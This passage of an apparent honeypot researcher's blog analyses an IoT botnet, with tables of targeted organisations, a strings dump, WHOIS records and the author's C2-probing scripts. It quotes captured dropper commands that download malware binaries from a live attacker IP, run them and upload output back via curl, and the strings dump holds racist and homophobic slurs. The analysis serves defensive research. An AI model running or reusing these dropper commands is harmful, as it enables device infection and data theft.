## 670     5                                    TalkTalk Communications Limited
## 698     5                                   TELUS Communications Inc. (TACE)
## 831     5                                     Xerox Corporation (XEROX-16-Z)
## 12      4                                                  ACEVILLE PTE.LTD.
## 14      4                                            Administered by AFRINIC
## 32      4                   Alibaba.com Singapore E-Commerce Private Limited
## 35      4                               Allstream Business US, LLC (ABUL-14)
## 53      4                                                               ARIN
## 73      4                   Bank of America, National Association (BANKOF-2)
## 116     4                                                     CERFnet (CERF)
## 140     4                                               Citicorp (CITICO-10)
## 216     4                                                         EE Limited
## 261     4                      Frontier Communications Corporation (FCC-210)
## 263     4                    Frontier Communications of America, Inc. (FRTR)
## 280     4                                                   GONET (GOVER-10)
## 308     4                                    Hong Kong Broadband Network Ltd
## 350     4                                     Internap Holding LLC (IC-1425)
## 403     4                       Liquid Telecommunications Operations Limited
## 417     4                      Massachusetts Institute of Technology (MIT-2)
## 428     4                                      MegaPath Corporation (MC-289)
## 441     4                                                  Microsoft Limited
## 499     4                  ORANGE BUSINESS COMMUNICATIONS TECHNOLOGY LIMITED
## 629     4                                                      Sprint (SPRN)
## 649     4                                  Suddenlink Communications (SUDDE)
## 676     4                                                    TDC Holding A/S
## 701     4                   Texas Department of Information Resources (TDIR)
## 800     4                                                      Vodafone GmbH

Random 01 Targets

Just curious…

random_01_org <- aggregate(
    count ~ Organization.Name, data=random_01_geo, FUN=sum
)
head(random_01_org[
    order(-random_01_org$count), c("count", "Organization.Name")
], n=100)
##     count                                                  Organization.Name
## 247   316                                                         Future use
## 417   292                                                          Multicast
## 180   258                              DoD Network Information Center (DNIC)
## 515   120                            RIPE Network Coordination Centre (RIPE)
## 514   110                                                           RIPE NCC
## 671   103                                           Verizon Business (MCICS)
## 37     98                                 Amazon Technologies Inc. (AT-88-Z)
## 143    96                           Comcast Cable Communications, LLC (CCCS)
## 53     84                    Asia Pacific Network Information Centre (APNIC)
## 55     71                                               AT&T Corp. (AC-3280)
## 12     55                                           Administered by RIPE NCC
## 268    55                                    Headquarters, USAISC (HEADQU-3)
## 555    54                                                     SOFTBANK Corp.
## 405    53                                       Microsoft Corporation (MSFT)
## 587    47                                         T-Mobile USA, Inc. (TMOBI)
## 110    38                          CenturyLink Communications, LLC (CCL-534)
## 114    34                               Charter Communications Inc (CC-3517)
## 494    33                                                 PSINet, Inc. (PSI)
## 173    31                                                Deutsche Telekom AG
## 262    29                                               Google LLC (GOOGL-2)
## 38     28                                         Amazon.com, Inc. (AMAZO-4)
## 351    27                                                             LACNIC
## 360    27                                      Level 3 Parent, LLC (LPL-141)
## 19     25                                Air Force Systems Networking (7ESG)
## 118    25                                                       China Mobile
## 622    25             The Prudential Insurance Company of America (PICA-3-Z)
## 36     23                        Amateur Radio Digital Communications (ARDC)
## 17     22                       African Network Information Center (AFRINIC)
## 62     21                                       AT&T Services, Inc. (ATTW-Z)
## 58     20                           AT&T Global Network Services, LLC (ATGS)
## 113    20                                      Charter Communications (CC04)
## 644    20                                             UK Ministry of Defence
## 230    19                                        Ford Motor Company (FORDMO)
## 295    19                                                      IBM (IBM-1-Z)
## 45     18                                            Apple Inc. (APPLEC-1-Z)
## 712    18                            Windstream Communications LLC (WINDS-6)
## 439    17                            North Star Information Hi.tech Ltd. Co.
## 646    17                             United States Postal Service. (USPS-3)
## 155    16                                      Cox Communications Inc. (CXA)
## 23     15                                 Akamai Technologies, Inc. (AKAMAI)
## 119    15                            China Mobile Communications Corporation
## 196    15                                     Eli Lilly and Company (ELILIL)
## 353    15 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 609    15                                        Telstra Corporation Limited
## 61     14                                      AT&T Services, Inc. (ATTSE-Z)
## 294    14                                                 IANA - Private Use
## 537    14                              Service Provider Corporation (SPC-10)
## 56     13                                               AT&T Corp. (AC-3873)
## 272    12                        HEWLETT PACKARD ENTERPRISE COMPANY (HPE-15)
## 316    12                         Internet Assigned Numbers Authority (IANA)
## 447    12                                        NTT America, Inc. (NTTAM-1)
## 565    12                                                    Sprint (SPRN-Z)
## 79     11                                                 Bell Canada (LINX)
## 287    11                                                  HP Inc. (HPINC-Z)
## 293    11                                                    IANA - Loopback
## 398    11                                             Mercedes-Benz Group AG
## 460    11                                              Optimum Online (OPTO)
## 547    11                                              SITA Switzerland Sarl
## 16     10              African Network Information Center - ( AfriNIC Ltd. )
## 427    10                   Navy Network Information Center (NNIC) (NNICN-1)
## 80      9                                              Bharti Airtel Limited
## 27      8                   Alibaba.com Singapore E-Commerce Private Limited
## 60      8                                        AT&T Mobility LLC (ATTMO-3)
## 516     8                        Rogers Communications Canada Inc. (RCC-182)
## 583     8                                                          SURF B.V.
## 541     7                                   Shaw Communications Inc. (SHAWC)
## 718     7                                     Xerox Corporation (XEROX-16-Z)
## 241     6                    Frontier Communications of America, Inc. (FRTR)
## 298     6                                                      iiNet Limited
## 331     6                                                     JCOM Co., Ltd.
## 334     6                                      JPMorgan Chase & Co. (JMC-39)
## 399     6                                       Merck and Co., Inc. (MERCKA)
## 436     6                             Nokia of America Corporation (NAC-178)
## 468     6                                                        Orange S.A.
## 63      5                                   ATI - Agence Tunisienne Internet
## 186     5                         DXC US Latin America Corporation (ESLAC-Z)
## 449     5                                        Oath Holdings Inc. (OH-207)
## 591     5                                        Tata Communications Limited
## 22      4                                            Airtel Networks Limited
## 43      4                                      ANS Communications, Inc (ANS)
## 235     4                                                           Free SAS
## 240     4                      Frontier Communications Corporation (FCC-212)
## 365     4                       Liquid Telecommunications Operations Limited
## 400     4                                        Merit Network Inc. (MICH-Z)
## 422     4               National Aeronautics and Space Administration (NASA)
## 457     4                                                      ONLINE S.A.S.
## 461     4                                             Optus Internet Pty Ltd
## 497     4                                             PT.TELKOMSEL Indonesia
## 530     4                                                    Scancom Limited
## 596     4                                              Telecom Italia S.p.A.
## 605     4                                                   Telenor Norge AS
## 607     4                                                   Telia Company AB
## 621     4                         The Procter and Gamble Company (THEPRO-10)
## 667     4                                  USDA Office of Operations (UOO-2)
## 26      3                                             Alibaba.com LLC (AL-3)
## 115     3                              Charter Communications, Inc (CC-3518)
## 125     3                                               Citicorp (CITICO-10)
## 187     3                           DXC US Latin America Corporation (ESLAC)
## 289     3                                       Hughes Network Systems (HNS)
## 327     3                                         JAB Wireless, INC. (JABWI)

Next Steps

Since this was largely an endeavor to chase the login prompts before they disappeared and test them out, and the honeypot seems to be hit with this binary enough to find plenty of them later, it's probably time to dig into the malware itself rather than watching network traffic.

The UPX stuff is going to be a pain for this part. After decompressing the binary the disassembly and decompilation is generally even more annoying… I might rage quit depending on the complexity and the fact that I have a full-time job to worry about ;)

$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

So time to crack out the standard tools: objdump, gdb -tui, xxd, etc.

I'll probably also be using a small quantity of Ghidra and these smaller tools I'd like to point out since they aren't as well known:

https://github.com/BoomerangDecompiler/boomerang

https://github.com/plasma-disassembler/plasma

https://www.rr-project.org/

Analyzing the chaff traffic looks clearly like a secondary attack to DDoS some networks or something while connecting back. While it's definitely not a random generation (at least not a consistent one), it could still just be a generative one I haven't identified such as ((Fibonacci()%253)+1) or something else along those lines. The one that most looks like random is WGETFLOOD, with miori a possible second, this is because of the inclusion of “Future use” and “Multicast” at equal levels of the random output.

All of the targets seemed to be infrastructure, US or North american telecom or government. It's not a huge surprise that the DoD, NASA, Navy, etc is near the top and lots of AT&T, Cloudflare, Level 3, RIPE, Comcast, Akamai, Sprint, Google, etc expected things. Some that stuck out were things like Eli Lilly, Merck, USPS, and Texas Department of Information Resources, they just seem odd. That being said, some of those showed up on random as well, so it's possible they just own more IP space than I'm aware of.

Most of these services are now gone. They disappear quite quickly. That being said, they pop up with new ones enough that I think it shouldn't be a problem finding new ones after doing more disassembly first.

UPDATE: UWU // 117.195.86.34:34673

New one found in the wild, analysis here.

Botnet Made By greek.Helios
hello
srhg
suckmadick
considertogoofflinetyvm
gooffline
ovhPwned
NfoPwned
skidripped
TaurusOnYaForhead
TaurusIsYoMomma
IWillNullYourToaster
YourMicrowaveIsAPieceofShit
OogaBoogaLanguage
KysFaggot
niggerssmell
niggersonyaforehead
23.254.230.120
/proc/
self
902i13
BzSxLxBxeY
HOHO-LUGO7
HOHO-U79OL
JuYfouyf87
NiGGeR69xd
SO190Ij1X
LOLKIKEEEDDE
ekjheory98e
scansh4
MDMA
fdevalvex
scanspc
MELTEDNINJAREALZ
flexsonskids
scanx86
MISAKI-U79OL
foAxi102kxe
swodjwodjwoj
MmKiy7f87l
freecookiex86
sysgpu
frgege
sysupdater
0DnAzepd
NiGGeRD0nks69
frgreu
0x766f6964
NiGGeRd0nks1337
gaft
urasgbsigboa
120i3UI49
OaF3
geae
vaiolmao
123123a
Ofurain0n4H34D
ggTrex
wasads
1293194hjXD
OthLaLosn
wget-log
1337SoraLOADER
SAIAKINA
ggtq
1378bfp919GRB1Q2
SAIAKUSO
ggtr
14Fa
SEXSLAVE1337
ggtt
1902a3u912u3u4
haetrghbr
19ju3d
SORAojkf120
hehahejeje92
2U2JDJA901F91
SlaVLav12
helpmedaddthhhhh
2wgg9qphbq
Slav3Th3seD3vices
hzSmYZjYMQ
5Gbf
sora
SoRAxD123LOL
iaGv
5aA3
SoRAxD420LOL
insomni
640277
SoraBeReppin1337
ipcamCache
66tlGg9Q
jUYfouyf87
6ke3
TOKYO3
lyEeaXul2dULCVxh
93OfjHZ2z
TY2gD6MZvKc7KU6r
mMkiy6f87l
A023UU4U24UIU
TheWeeknd
mioribitches
A5p9
TheWeeknds
mnblkjpoi
AbAd
Tokyos
Akiru
U8inTz
netstats
Alex
W9RCAKM20T
newnetword
Ayo215
Word
nloads
Wordmane
notyakuzaa
Belch
Wordnets
BigN0gg0r420
X0102I34f
ofhasfhiafhoi
X19I239124UIU
oism
XSHJEHHEIIHWO
olsVNwo12
DeportedDeported
XkTer0GbA1
onry0v03
FortniteDownLOLZ
Y0urM0mGay
pussyfartlmaojk
GrAcEnIgGeRaNn
YvdGkqndCO
qGeoRBe6BE
GuiltyCrown
ZEuS69
s4beBsEQhd
HOHO-KSNDO
ZEuz69
sat1234
aj93hJ23
scanHA
alie293z0k2L
scanJoshoARM
HellInSide
ayyyGangShit
scanJoshoARM5
HighFry
b1gl
scanJoshoARM6
IWhPyucDbJ
boatnetz
scanJoshoARM7
IuYgujeIqn
btbatrtah
scanJoshoM68K
JJDUHEWBBBIB
scanJoshoMIPS
JSDGIEVIVAVIG
cKbVkzGOPa
scanJoshoMPSL
ccAD
scanJoshoPPC
KAZEN-OIU97
chickenxings
scanJoshoSH4
yakuskzm8
KAZEN-PO78H
cleaner
scanJoshoSPC
KAZEN-U79OL
dbeef
scanJoshoX86
yakuz4c24
KETASHI32
ddrwelper
scanarm5
zPnr6HpQj2
Kaishi-Iz90Y
deexec
scanarm6
zdrtfxcgy
Katrina32
doCP3fVj
scanarm7
zxcfhuio
Ksif91je39
scanm68k
Kuasa
dvrhelper
scanmips
KuasaBinsMate
eQnOhRk85r
scanmpsl
LOLHHHOHOHBUI
eXK20CL12Z
mezy
QBotBladeSPOOKY
hikariwashere
p4029x91xx
32uhj4gbejh
a.out
lzrd
PownedSecurity69
.ares
fxlyazsxhy
jnsd9sdoila
yourmomgaeis
sdfjiougsioj
Oasis
SEGRJIJHFVNHSNHEIHFOS
apep999
KOWAI-BAdAsV
KOWAI-SAD
jHKipU7Yl
airdropmalware
your_verry_fucking_gay
Big-Bro-Bright
sefaexec
shirololi
eagle.
For-Gai-Mezy
0x6axNL
cloqkisvspooky
myth
SwergjmioG
KILLEJW(IU(JIWERGFJGJWJRG
Hetrh
wewrthe
IuFdKssCxz
jSDFJIjio
OnrYoXd666
ewrtkjoketh
ajbdf89wu823
AAaasrdgs
WsGA4@F6F
GhostWuzHere666
BOGOMIPS
sfc6aJfIuY
Demon.
xeno-is-god
ICY-P-0ODIJ
gSHUIHIfh
wrgL
hu87VhvQPz
dakuexecbin
TacoBellGodYo
loligang
Execution
orbitclient
Amnesia
Owari
UnHAnaAW
z3hir
obbo
miori
eagle
doxxRollie
lessie.
hax.
yakuza
wordminer
minerword
SinixV4
hoho
g0dbu7tu
orphic
furasshu
horizon
assailant
Ares
Kawaiihelper
ECHOBOT
DEMONS
kalon
Josho
daddyscum
akira.ak
Hilix
daku
Tsunami
estella
Solar
rift
_-255.Net
Cayosin
Okami
Kosha
bushido
trojan
shiina
Reaper.
Corona.
wrgnuwrijo
Hari
orage
fibre
galil
stresserpw
stresser.pw
Tohru
Omni
kawaii
Frosti
sxj472sz
HU6FIZTQU
PFF1500RG
plzjustfuckoff
nvitpj
elfLoad
Amakano
tokupdater
cum-n-go
oblivion
Voltage
scanppc
A Leafeon is listening on your device
inetnum:        117.194.0.0 - 117.195.255.255
netname:        BB-Multiplay
descr:          Broadband Multiplay Project, O/o DGM BB, NOC BSNL Bangalore
country:        IN
admin-c:        BH155-AP
tech-c:         DB374-AP
abuse-c:        AB1061-AP
status:         ALLOCATED NON-PORTABLE
mnt-by:         MAINT-IN-DOT
mnt-irt:        IRT-BSNL-IN
last-modified:  2021-07-15T07:19:01Z
source:         APNIC

irt:            IRT-BSNL-IN
address:        Internet Cell
address:        Bharat Sanchar Nigam Limited.
address:        8th Floor,148-B Statesman House
address:        Barakhamba Road, New Delhi - 110 001
e-mail:         abuse1@bsnl.co.in
abuse-mailbox:  abuse1@bsnl.co.in
admin-c:        NC83-AP
tech-c:         CGMD1-AP
auth:           # Filtered
remarks:        abuse1@bsnl.co.in was validated on 2022-05-12
mnt-by:         MAINT-IN-DOT
last-modified:  2022-05-12T10:21:35Z
source:         APNIC
$ curl -i 117.195.86.34:34673
HTTP/1.1 200 OK
Server: nginx
Content-Length: 135784
Connection: close
Content-Type: application/zip

107.182.129.226

$ curl -i http://107.182.129.226
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2022 19:30:36 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 03 Sep 2022 15:44:45 GMT
ETag: "270-5e7c7b9d3f067"
Accept-Ranges: bytes
Content-Length: 624
Vary: Accept-Encoding
Content-Type: text/html

rm -rf a3; curl http://107.182.129.226/uwu/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 107.182.129.226:9832 -T a;

rm -rf a2; curl http://107.182.129.226/uwu/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 107.182.129.226:9832 -T b;

rm -rf a1; curl http://107.182.129.226/uwu/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 107.182.129.226:9832 -T c;

rm -rf a6; curl http://107.182.129.226/uwu/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 107.182.129.226:9832 -T d;

rm -rf a9; curl http://107.182.129.226/uwu/mipsel > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 107.182.129.226:9832 -T e;
Index of /a

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       arm              2022-08-13 14:14  55K  
[   ]       arm5             2022-08-13 14:14  47K  
[   ]       arm6             2022-08-13 14:14  64K  
[   ]       arm7             2022-08-13 14:14 126K  
[   ]       m68k             2022-08-13 14:14  55K  
[   ]       mips             2022-08-13 14:14  72K  
[   ]       mpsl             2022-08-13 14:14  72K  
[   ]       ppc              2022-08-13 14:14  55K  
[   ]       sh4              2022-08-13 14:14  51K  
[   ]       spc              2022-08-13 14:14  59K  
[TXT]       wget.sh          2022-08-13 04:21  285  
[   ]       x86              2022-08-13 14:14  50K  
══════════════════════════════════════════════════════════════

 Apache/2.4.29 (Ubuntu) Server at 107.182.129.226 Port 80
Index of /uwu

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       arm              2022-08-13 08:07  55K  
[   ]       arm5             2022-08-13 08:07  47K  
[   ]       arm6             2022-08-13 08:07  64K  
[   ]       arm7             2022-08-13 08:07 126K  
[   ]       m68k             2022-08-13 08:07  55K  
[   ]       mips             2022-08-13 08:07  72K  
[   ]       mpsl             2022-08-13 08:07  72K  
[   ]       ppc              2022-08-13 08:07  55K  
[   ]       sh4              2022-08-13 08:07  51K  
[   ]       spc              2022-08-13 08:07  59K  
[   ]       x86              2022-08-13 08:07  50K  
══════════════════════════════════════════════════════════════

 Apache/2.4.29 (Ubuntu) Server at 107.182.129.226 Port 80

C2 server:

$ cat contained_uwu.txt | grep -E "DST=.*DPT=" | sed -r "s/^.* DST=([^ ]*) .* DPT=([0-9]+) .*$/\1:\2/g" | sort | uniq -c | sort -g | tail -n 10
  2 191.75.115.13:23
  2 206.178.221.254:23
  2 40.174.62.64:23
  2 45.174.28.54:23
  2 54.91.196.133:23
  2 67.78.63.43:23
  2 72.105.154.36:23
  2 81.103.105.180:23
  2 93.155.124.67:23
493 156.96.151.226:7854
NetRange:       156.96.0.0 - 156.96.255.255
CIDR:           156.96.0.0/16
NetName:        NEWTREND
NetHandle:      NET-156-96-0-0-1
Parent:         NET156 (NET-156-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       
Organization:   NEWTREND (NEWTRE)
RegDate:        1991-12-23
Updated:        2021-12-14
Ref:            https://rdap.arin.net/registry/ip/156.96.0.0

OrgName:        NEWTREND
OrgId:          NEWTRE
Address:        FastLink Network - Newtrend Division
Address:        P.O. Box 17295
City:           Encino
StateProv:      CA
PostalCode:     91416
Country:        US
RegDate:        1991-12-23
Updated:        2011-09-24
Ref:            https://rdap.arin.net/registry/entity/NEWTRE

Output of malware to 156.96.151.226:7854

< 00000000 33 66 99 05 00                                  # 3f...
echo -e "\x33\x66\x99\x05\x00" | socat -ddd - tcp:156.96.151.226:7854
2022/09/17 16:39:38 socat[282837] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2022/09/17 16:39:38 socat[282837] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2022/09/17 16:39:38 socat[282837] I This product includes software written by Tim Hudson (tjh@cryptsoft.com)
2022/09/17 16:39:38 socat[282837] N reading from and writing to stdio
2022/09/17 16:39:38 socat[282837] N opening connection to AF=2 156.96.151.226:7854
2022/09/17 16:39:38 socat[282837] I starting connect loop
2022/09/17 16:39:38 socat[282837] I socket(2, 1, 6) -> 5
2022/09/17 16:39:38 socat[282837] N successfully connected from local address AF=2 10.2.0.2:60078
2022/09/17 16:39:38 socat[282837] I resolved and opened all sock addresses
2022/09/17 16:39:38 socat[282837] N starting data transfer loop with FDs [0,1] and [5,5]
2022/09/17 16:39:38 socat[282837] I transferred 6 bytes from 0 to 5
2022/09/17 16:39:38 socat[282837] N socket 1 (fd 0) is at EOF
2022/09/17 16:39:38 socat[282837] I shutdown(5, 1)
2022/09/17 16:39:38 socat[282837] W read(5, 0x5581670a4000, 8192): Connection reset by peer
2022/09/17 16:39:38 socat[282837] N socket 2 to socket 1 is in error
2022/09/17 16:39:38 socat[282837] N socket 2 (fd 5) is at EOF
2022/09/17 16:39:38 socat[282837] I shutdown(5, 2)
2022/09/17 16:39:38 socat[282837] I shutdown(5, 2): Transport endpoint is not connected
2022/09/17 16:39:38 socat[282837] N exiting with status 0

Normally you should see something after the “shutdown” command, which only shuts down the write stream. Tried a few different ways including netcat and by hand, nothing. I'm pretty sure these are just callbacks now to detect infected nodes. I see no way these can be actual logins into anything. This whole system has to be a ruse, or just a waste of time. It could also already have been sinkholed, I ran nmap and all the ports are open, so that looks like software that just blackholes everything defensively which is common for all of these particular malware strains. When they get knocked offline they don't get sinkholed in that way, they get taken down completely and everything is blocked and closed. Then again, this is a different datacenter, so who knows. For now unless I get further information, my conclusion is this is just a callback to detect infected nodes.

My Debug Scripts

These were the scripts used to debug and try to use as a middle-man to attempt to break into the servers.

server.py

#!/usr/bin/env python3

import socket, time

IP="127.0.0.1"
PORT=55566
RESPONSES=[
    b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"',
    b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m',
    b'\r\n\x1b[1;35m\xe3\x83\x91\x1b[1;37m\xe3\x82\xb9\x1b[1;35m\xe3\x83\xaf\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x83\x89\x1b[1;36m: \x1b[0m',
    b'\r\n\r\n\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\',
    b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|',
    b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-',
    b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|',
    b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/',
    b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\',
    b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\
xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/',
    b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-',
    b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|'
]
PING=b"\x00\x00"
RESPONSES_SENT=0

sock = socket.create_server((IP, PORT))
sock.listen(0)
keep_listening = True
while keep_listening:
    try:
        (conn, address) = sock.accept()

        while True:
            datatup = conn.recvfrom(1024)
            if len(datatup[0]) > 0:
                print("RECV DATA:", datatup)

                if len(RESPONSES) > RESPONSES_SENT:
                    print("SEND DATA:", RESPONSES[RESPONSES_SENT])
                    conn.sendall(RESPONSES[RESPONSES_SENT])
                    RESPONSES_SENT += 1
                else:
                    print("SEND PING:", PING)
                    conn.sendall(PING)

            time.sleep(0.5)

    except ConnectionError as e:
        print("ConnectionError:", e)
        RESPONSES_SENT = 0

    except Exception as e:
        keep_listening = False
        print("Exception:", e)
        if conn is not None:
            conn.close()
        if sock is not None:
            sock.close()

client.py

#!/usr/bin/env python3

import socket, time

#IP="46.19.137.50"
#IP="2.56.59.196"
IP="45.95.55.27"
#PORT=55566
#PORT=7777
PORT=32774
CALLDATA=[
    b"\x03\x00\x02\x01\x00",
    b"\x00"
]
PING=b"\x00\x00"
CALLDATA_SENT=0

keep_connecting=True
while keep_connecting:
    sock = socket.create_connection((IP, PORT), 130)
#, ("", 53168))

    try:
        if len(CALLDATA) > CALLDATA_SENT:
            print("SEND DATA:", CALLDATA[CALLDATA_SENT])
            sock.send(CALLDATA[CALLDATA_SENT])
            CALLDATA_SENT += 1
        else:
            print("SEND PING:", PING)
            sock.send(PING)

        datatup = sock.recvfrom(1024)
        print("RESPONSE:", datatup)
        time.sleep(0.5)

    except ConnectionError as e:
        print("ConnectionError:", e)
        CALLDATA_SENT = 0

    except Exception as e:
        print("Exception:", e)
        if sock is not None:
            sock.close()

Boilerplate GeoIP Disclaimer

Geolocation based on IP address is not to be taken as entirely accurate as to the source of traffic or attacks conducted. There are many reasons for this, which include (but are not limited to):

Proxies, VPNs, and Tor

Large quantities of traffic, especially attack based traffic, will use a VPN or the Tor network (or some reasonable facsimile), to mask the origin of the traffic. This will in turn change the appearance of the location of origin. Usually, an attacker will also intentionally want the traffic to appear to come from somewhere that has some form of lesser legal jurisdiction, some form of lesser ability to police traffic, or come from a well known source of malicious attacks such as China or Russia.

For instance, the following log entry was generated by myself against my servers while sitting at my desk in the United States, but it gets geolocated as Russia because of how the packet was sent. This sort of masking is trivial to perform, even by a nine year old on a cellphone.

httpd_data[grep("/from/russia/with/logs", httpd_data$Request), c("Request", "Response.Code", "Country.Code")]

##                               Request Response.Code Country.Code
## 1 GET /from/russia/with/logs HTTP/1.1           404           RU

Vulnerable Servers and Botnets

Some locations will have a higher distribution of virtual servers than others, such as Silicon Valley or China. This can lead to larger quantities of vulnerable virtual machines and servers in those regions, and distort the resulting aggregate data.

Government Interference

It is possible that due to address assignment for governmental intelligence purposes or other economic or political reasons a nation could re-allocate address space and forge the identity similarly to a NAT (network address translation). They could also funnel information via VPN technologies for another nation.

Because most of these agreements are made in private, and due to the fact that most geolocation, RDAP, and WHOIS records are based on self-reporting, it is impossible to know the 100% true nature of geographic address assignment.

Weaknesses or errors in MaxMind, rgeolocate, RDAP, or WHOIS

This geolocation uses the rgeolocate package available in CRAN, and uses the internal country database that is shipped with it. There could be an error in the database shipped, there could be an error in the lookup code, etc. Bugs happen. I have no reason to believe that any false geolocation is being performed by these packages, however.

Also used is the self-reported RDAP or WHOIS systems which can frequently be self-reported falsely or misleadingly. Which of the systems (RDAP, WHOIS, or rgeolocate) used are disclosed when necessary.

Final Note

Despite these weaknesses, this doesn't change the fact that looking at this sort of data can be quite fun and interesting, and potentially enlightening. Generalized conclusions should not be made from this data or the maps herein. You have been warned.